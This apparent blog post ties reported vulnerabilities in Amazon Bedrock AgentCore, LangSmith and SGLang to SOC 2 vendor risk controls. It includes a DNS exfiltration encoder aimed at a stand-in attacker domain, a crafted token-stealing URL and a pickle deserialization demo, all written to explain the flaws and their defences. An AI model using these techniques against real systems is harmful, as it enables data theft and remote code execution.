
Bedrock, LangSmith, SGLang: Three AI Platform Vulns That Expose Your Compliance Gaps

Critical vulnerabilities in Amazon Bedrock, LangSmith, and SGLang reveal why AI vendor risk management is now a SOC 2 and EU AI Act requirement.

Three of the most popular AI development platforms disclosed serious security vulnerabilities this week. Amazon Bedrock AgentCore, LangSmith, and SGLang each had flaws that allow data exfiltration, account takeover, or remote code execution. If you're a startup building on any of these tools, the security implications are obvious. The compliance implications are what I want to talk about, because most teams aren't thinking about those yet.

Here's the uncomfortable question: does your SOC 2 vendor risk assessment cover your AI platform stack? Not your cloud provider. Not your database host. Your LLM orchestration layer, your model serving framework, your trace and evaluation tooling. The platforms where your prompts, training data, customer queries, and model outputs actually live.

For 67% of CISOs, the answer is no. A survey published alongside these disclosures found that two-thirds of security leaders have limited visibility into how AI is being used across their organization. Only 11% have AI-specific security tools. Three-quarters are still relying on legacy security controls that weren't designed for AI workloads.

These numbers line up with what I see in practice. Startups are moving fast on AI product development and treating the AI vendor stack as an implementation detail rather than a compliance-critical dependency. This week's disclosures show why that's a problem.

What actually happened

Let me break down each vulnerability and why it matters for your compliance posture.

Amazon Bedrock AgentCore: your "isolated" sandbox talks to the internet

BeyondTrust discovered that Amazon Bedrock's AgentCore Code Interpreter - the sandbox environment where your AI agents execute code - permits outbound DNS queries even when configured with "no network access." That sounds like a minor misconfiguration. It isn't.

DNS is enough. An attacker can establish a bidirectional command-and-control channel using nothing but DNS queries and responses: an implant inside the sandbox polls an attacker-controlled domain, receives commands encoded in the DNS responses, executes them, and exfiltrates the results encoded as subdomain labels in subsequent queries. The sandbox has no network access in the traditional sense - no HTTP, no TCP connections to external hosts - but DNS slips through.
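
To make the exfiltration half concrete, here's a minimal sketch of how stolen data fits into ordinary-looking DNS queries. It's inert - it only builds strings, never resolves anything - and attacker.example is a hypothetical attacker-controlled domain:

```python
# Illustrative only: how exfiltrated data gets packed into DNS query names.
# A real channel would resolve each name against the attacker's nameserver;
# this just shows why "DNS only" is still a data channel.

def chunk_into_dns_queries(data: bytes, domain: str = "attacker.example") -> list[str]:
    encoded = data.hex()              # hex keeps every label DNS-safe
    label_size = 60                   # individual DNS labels max out at 63 bytes
    chunks = [encoded[i:i + label_size] for i in range(0, len(encoded), label_size)]
    # One query per chunk; the sequence number lets the receiver reassemble.
    return [f"{i}.{chunk}.{domain}" for i, chunk in enumerate(chunks)]

queries = chunk_into_dns_queries(b"whatever the agent's IAM role can read")
```

Each query looks like routine name resolution to the sandbox, which is exactly why DNS firewalls that inspect outbound query patterns are part of the recommended fix.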

The CVSS score is 7.5, which honestly undersells the impact. The data at risk depends on whatever IAM role the Code Interpreter assumes. In many deployments, that includes S3 bucket contents, AWS resource access, and any data the agent is processing on behalf of your customers.

The fix is to migrate from sandbox mode to VPC mode for complete network isolation and implement DNS firewalls to filter outbound DNS traffic. But the compliance question is: did your vendor risk assessment catch this? Did you know your AI sandbox had a network isolation gap? If the answer is no, your vendor assessment process has a gap that goes beyond this single vulnerability.

LangSmith: one crafted link steals your entire AI trace history

Miggo Security found CVE-2026-25750 in LangSmith, the observability and evaluation platform from LangChain. The vulnerability is a URL parameter injection through an unvalidated baseUrl parameter, and it's exactly as bad as it sounds.

An attacker crafts a link like smith.langchain.com/studio/?baseUrl=https://attacker-server.com and sends it to a LangSmith user. When the victim clicks, the application sends their bearer token, user ID, and workspace ID to the attacker's server. With those credentials, the attacker gets access to the victim's complete AI trace history - every prompt, every response, every evaluation run.
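
The underlying bug class is trusting a user-supplied base URL without validating its host. A minimal sketch of the kind of allowlist check that prevents it (the allowed hosts here are assumptions for illustration):

```python
from urllib.parse import urlparse

# Hypothetical allowlist for a user-supplied baseUrl parameter.
# The bug class: sending credentials wherever the parameter points
# without first checking the destination host.
ALLOWED_HOSTS = {"smith.langchain.com", "api.smith.langchain.com"}

def is_safe_base_url(base_url: str) -> bool:
    parsed = urlparse(base_url)
    # Require HTTPS and an exact host match - no suffix matching,
    # which would let smith.langchain.com.evil.com slip through.
    return parsed.scheme == "https" and parsed.hostname in ALLOWED_HOSTS
```

Exact host matching matters: substring or endswith checks are a classic bypass for this class of vulnerability.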

Here's where it gets compliance-critical: LangSmith traces often contain production data. SQL queries. CRM records. Customer conversations. Proprietary source code. Whatever your AI application processes, LangSmith probably has a copy of it in the trace logs. A single stolen bearer token gives an attacker access to all of that data.

The CVSS score is 8.5. LangChain fixed it in version 0.12.71 back in December 2025. But if you're running a self-hosted LangSmith instance, you need to verify you've patched. And either way, the question for your compliance team is: was LangSmith in your vendor inventory? Did you assess what data flows through it? Did you evaluate what happens when LangSmith credentials are compromised?

SGLang: three unpatched RCE vulnerabilities via pickle deserialization

This is the worst of the three. Igor Stepansky at Orca Security found three separate remote code execution vulnerabilities in SGLang, the open-source LLM serving framework from the LMSYS team. All three exploit unsafe pickle deserialization - pickle.loads() and pickle.load() called without authentication or validation.

  • CVE-2026-3059 (CVSS 9.8): Unauthenticated RCE via the ZeroMQ broker
  • CVE-2026-3060 (CVSS 9.8): Unauthenticated RCE via the disaggregation module
  • CVE-2026-3989 (CVSS 7.8): Insecure deserialization in the crash dump replay utility

An attacker who can reach the ZeroMQ ports can send a malicious pickle file and get full code execution on the host. No authentication required. No exploitation complexity. Just send the payload.
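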
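
If "a pickle file means code execution" sounds surprising, here's a harmless self-contained demonstration of the primitive. Pickle's `__reduce__` protocol lets a serialized object specify "call this function with these arguments" at load time - an attacker just substitutes something destructive for the benign function here:

```python
import pickle

# Why unauthenticated pickle.loads() is an RCE primitive: deserialization
# can invoke arbitrary callables. This demo calls a harmless local function;
# a real payload would call os.system or similar.

executed = []

def attacker_controlled(arg):
    executed.append(arg)

class Payload:
    def __reduce__(self):
        # Tells pickle: on load, call attacker_controlled("pwned")
        return (attacker_controlled, ("pwned",))

malicious_bytes = pickle.dumps(Payload())
pickle.loads(malicious_bytes)   # "just deserializing" runs the call
```

This is why pickle's own documentation warns against loading untrusted data - and why three separate SGLang entry points doing exactly that earned two 9.8s.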

As of this writing, all three are unpatched. There's no fix available. If you're running SGLang in production, your only mitigation is network segmentation - restricting service access to trusted networks and monitoring for unexpected connections.
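
Until a patch lands, you can at least verify the segmentation holds. A minimal reachability probe, run from a network segment that should not have access - the port numbers are placeholders, since SGLang's ZeroMQ ports depend on your launch configuration:

```python
import socket

# Probe whether a host:port is reachable from wherever this runs.
# Run it from an untrusted segment: every SGLang/ZeroMQ port should
# fail to connect there if your segmentation is working.
def is_port_reachable(host: str, port: int, timeout: float = 2.0) -> bool:
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False

# Example: check deployment-specific ports (placeholders, not SGLang defaults).
# for port in (30000, 30001):
#     print(port, is_port_reachable("sglang-host.internal", port))
```

A reachable port from an untrusted segment is, right now, equivalent to remote code execution on that host.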

For compliance purposes, this is an active, known, unpatched critical vulnerability in a production dependency. Your SOC 2 auditor is going to ask how you're managing this risk. "We didn't know" is not an acceptable answer.

Why your vendor risk assessment missed this

Most startups I work with have some form of vendor risk assessment. It covers the big platforms: AWS, Google Cloud, their database provider, maybe their CI/CD tooling. But the AI platform stack sits in a blind spot. Here's why.

The AI stack grew bottom-up

Nobody made a centralized decision to adopt LangChain, or SGLang, or any specific model serving framework. An engineer found a tool that solved a problem, integrated it, and shipped. By the time the compliance team learned about it, the tool was in production handling customer data.

This is the same shadow IT problem that created cloud sprawl a decade ago, but it's moving faster. AI development tooling changes month to month. New frameworks appear, get adopted, and become production dependencies before security review processes catch up.

AI tools don't look like traditional vendors

When your procurement team evaluates a vendor, they're thinking about SaaS platforms with enterprise sales teams, SOC 2 reports, and security questionnaires. SGLang is an open-source project. LangSmith has a cloud offering but many teams self-host it. Amazon Bedrock AgentCore is a managed service, but it's consumed as an API feature rather than a standalone vendor relationship.

None of these fit neatly into the traditional vendor assessment workflow. So they get skipped.

The data flow isn't obvious

With a traditional SaaS vendor, the data flow is relatively clear: you send customer data to the platform, the platform processes it, you get results back. With AI tooling, the data flow is more complex.

LangSmith captures traces of every interaction your AI application processes. That means every customer query, every database result, every API response that feeds into your LLM pipeline gets copied into LangSmith's storage. A model serving framework like SGLang processes the actual inference requests - the raw prompts and completions. Bedrock's Code Interpreter executes arbitrary code with access to whatever resources its IAM role permits.

The volume and sensitivity of data flowing through these tools often exceeds what flows through traditional SaaS vendors. But because AI teams think of these as "development tools" rather than "data processors," the data classification step gets missed.

What SOC 2 actually requires

Let me map this to specific SOC 2 trust services criteria, because the requirements aren't ambiguous - they're just not being applied to AI vendors.

CC6.1: Logical and physical access controls

You need to demonstrate that you control access to information and systems. That includes third-party systems that process your data. When LangSmith stores your complete trace history and a URL parameter injection can steal access credentials, that's a CC6.1 gap. You need to show your auditor that you've assessed the access controls on every platform that handles sensitive data, including your AI observability tooling.

CC7.2: Monitoring for anomalous activity

You need to monitor for anomalies across your environment. When Bedrock's sandbox leaks data via DNS and you're not monitoring for DNS-based exfiltration from your AI workloads, that's a CC7.2 gap. I covered the broader runtime monitoring challenge in yesterday's post on AI agent monitoring - the vendor vulnerability angle adds another dimension to the same problem.

CC9.2: Vendor risk management

This is the big one. CC9.2 requires you to assess and manage risks from third-party service providers. The criterion explicitly covers evaluating vendor security controls, monitoring for changes in vendor risk posture, and having contingency plans when vendors have security incidents.

A vendor with three unpatched CVSS 9.8 vulnerabilities is a material risk. Your auditor will want to see how you identified this risk, what compensating controls you implemented, and what your plan is if the vulnerabilities are exploited before patches are available.

Building AI vendor risk into your compliance workflow

Here's the practical framework I use with clients. It's designed for small teams that can't afford a dedicated vendor risk management platform but still need to satisfy SOC 2 requirements.

Step 1: Build your AI vendor inventory

Start by listing every tool in your AI stack that touches data. Not just the ones you're paying for. Include:

Category              | Examples                              | Data Exposure
----------------------|---------------------------------------|---------------------------------
Model providers       | OpenAI, Anthropic, Bedrock, Vertex AI | Prompts, completions, embeddings
Orchestration         | LangChain, LlamaIndex, Haystack       | Full pipeline data flow
Serving frameworks    | SGLang, vLLM, TGI, Ollama             | Raw inference requests
Observability         | LangSmith, Langfuse, Phoenix          | Complete trace history
Vector databases      | Pinecone, Weaviate, Qdrant            | Embedded document content
Fine-tuning platforms | Weights & Biases, MLflow              | Training data, model weights

For each tool, document: who owns it, what data flows through it, how it's deployed (cloud vs self-hosted), and when it was last reviewed for security.
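
One way to keep that inventory auditable rather than trapped in a spreadsheet is a plain data structure checked into the compliance repo. A sketch - the tool names are real, but owners and dates are made up for illustration:

```python
from dataclasses import dataclass

# Minimal AI vendor inventory record. Fields mirror what the
# assessment needs: owner, data exposure, deployment, review date.
@dataclass
class AIVendor:
    name: str
    category: str
    owner: str
    data_exposure: str
    deployment: str       # "cloud" or "self-hosted"
    last_reviewed: str    # ISO date, so string comparison sorts correctly

inventory = [
    AIVendor("LangSmith", "observability", "platform-team",
             "complete trace history", "self-hosted", "2026-01-15"),
    AIVendor("SGLang", "serving", "ml-infra",
             "raw inference requests", "self-hosted", "2026-01-15"),
]

# Flag anything not reviewed since the start of the quarter.
stale = [v.name for v in inventory if v.last_reviewed < "2026-01-01"]
```

Because it's code, the staleness check can run in CI - which turns "review quarterly" from a good intention into a failing build.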

Step 2: Classify data sensitivity per tool

Not every AI tool handles the same level of sensitive data. Your model provider might only see anonymized prompts if you've built your pipeline correctly. But your observability tool probably captures everything, because that's the point of observability.

Map each tool to a data sensitivity level:

  • Critical: Handles PII, financial data, or credentials (LangSmith traces, fine-tuning datasets)
  • High: Handles proprietary business logic or customer content (model providers, orchestration layers)
  • Medium: Handles internal data or metadata (vector databases with non-sensitive content, experiment tracking)
  • Low: No customer or sensitive data exposure (local development tools, CI/CD for model deployment)

Focus your assessment effort on Critical and High first. This is where the compliance risk lives.
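
The triage itself is simple enough to automate once the classification exists. A sketch - the sensitivity assignments below are illustrative, since yours depend on your actual data flows:

```python
# Order assessment work by sensitivity so Critical/High get reviewed first.
SENSITIVITY_RANK = {"Critical": 0, "High": 1, "Medium": 2, "Low": 3}

classification = {
    "LangSmith": "Critical",           # full trace history
    "fine-tuning datasets": "Critical",
    "OpenAI API": "High",              # sees prompts and completions
    "Qdrant": "Medium",                # non-sensitive embedded docs
    "local eval scripts": "Low",
}

assessment_queue = sorted(classification,
                          key=lambda tool: SENSITIVITY_RANK[classification[tool]])
first_up = [t for t in assessment_queue
            if classification[t] in ("Critical", "High")]
```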

Step 3: Assess vendor security posture

For each Critical and High tool, gather:

  1. Does the vendor have a SOC 2 report? Major cloud providers and established SaaS platforms will. Open-source frameworks won't.
  2. What's their vulnerability disclosure history? Check NVD, GitHub advisories, and security mailing lists. A history of responsible disclosure is a positive signal. Unpatched critical vulns (like SGLang right now) are a red flag.
  3. What's the blast radius of a compromise? If this tool's credentials are stolen, what's the maximum data exposure? The LangSmith vulnerability shows this clearly - a single bearer token exposed the entire trace history.
  4. What's your exit plan? If this vendor has a security incident, how quickly can you switch to an alternative? Can you revoke access within minutes?

For open-source tools, you won't get a SOC 2 report or a security questionnaire response. That's fine. Document the risk, implement compensating controls (network segmentation, access restrictions, monitoring), and show your auditor that you've thought about it. The audit requirement isn't that every vendor has a SOC 2 report. It's that you've assessed and managed the risk. If you're looking for a broader framework for structuring this, my SaaS compliance stack guide walks through how different compliance requirements layer on top of each other.

Step 4: Implement compensating controls

For AI tools that don't meet your security bar, implement compensating controls rather than ripping them out. The practical options:

  • Network segmentation: Run AI infrastructure in isolated network segments. This is your primary defense against the SGLang vulnerabilities - if the ZeroMQ ports aren't reachable from untrusted networks, the RCE risk drops dramatically.
  • DNS filtering: Deploy DNS firewalls on your AI workloads. This directly mitigates the Bedrock AgentCore vulnerability and catches any similar DNS-based exfiltration attempts.
  • Credential rotation: Automate credential rotation for AI platform access. When the LangSmith vulnerability was active, short-lived tokens would have limited the blast radius of a compromise.
  • Data minimization: Don't send more data to AI tools than they need. If your LangSmith traces don't need to capture full customer PII, mask sensitive fields before they enter the trace pipeline. This is the same principle behind the audit-ready LLM architecture I've written about - design the data flow for minimum exposure.
  • Monitoring: Monitor for IOCs specific to these vulnerabilities. Unexpected DNS TXT record lookups from sandbox environments. Unusual API calls from LangSmith service accounts. New connections to ZeroMQ ports.
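
The data minimization point is the most actionable one for small teams. A sketch of masking at the trace boundary - the regex patterns here are illustrative, and production masking needs a real PII detection pass rather than three regexes:

```python
import re

# Mask obvious sensitive fields before a payload enters the trace pipeline,
# so a compromised observability credential exposes masked data, not PII.
PATTERNS = [
    (re.compile(r"[\w.+-]+@[\w-]+\.[\w.]+"), "<email>"),
    (re.compile(r"\b\d{3}-\d{2}-\d{4}\b"), "<ssn>"),
    (re.compile(r"\bAKIA[0-9A-Z]{16}\b"), "<aws-key>"),
]

def mask_trace_payload(text: str) -> str:
    for pattern, replacement in PATTERNS:
        text = pattern.sub(replacement, text)
    return text
```

Run this as middleware in front of whatever ships traces, and the LangSmith-style scenario degrades from "attacker reads customer PII" to "attacker reads placeholders."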

Step 5: Document and review quarterly

Put it all in writing. Your AI vendor risk register should be a living document that gets reviewed quarterly (at minimum) and updated whenever a new disclosure drops. This week is a good example - three disclosures in one day. Your register should reflect the new risk posture within a week, not whenever you get around to it.

The documentation serves two purposes: it shows your auditor that you're actively managing AI vendor risk, and it gives your engineering team a clear picture of which tools carry compliance obligations. Both matter.

The bigger picture

This week's disclosures aren't an anomaly. They're the beginning of a pattern. AI development tooling is young, fast-moving, and built by teams optimizing for capability rather than security. The same trajectory played out with cloud infrastructure a decade ago and DevOps tooling five years ago. The difference is that AI tools handle more sensitive data earlier in their maturity lifecycle than either of those predecessors.

The 67% of CISOs with limited AI visibility aren't failing because they're incompetent. They're failing because their vendor risk processes were designed for a world where you could enumerate your technology dependencies by looking at procurement contracts. That world is gone. Your AI stack grows by pip install and GitHub stars, and your compliance program needs to keep up.

The startups that treat AI vendor risk as a first-class compliance concern now will have clean audits and credible security postures when the scrutiny intensifies. The ones that wait will be retroactively documenting risk assessments while their auditor asks pointed questions about why three CVSS 9.8 vulnerabilities in a production dependency went unnoticed.

I know which position I'd rather be in.



Building on AI platforms and need to pass your SOC 2 audit? Let's talk.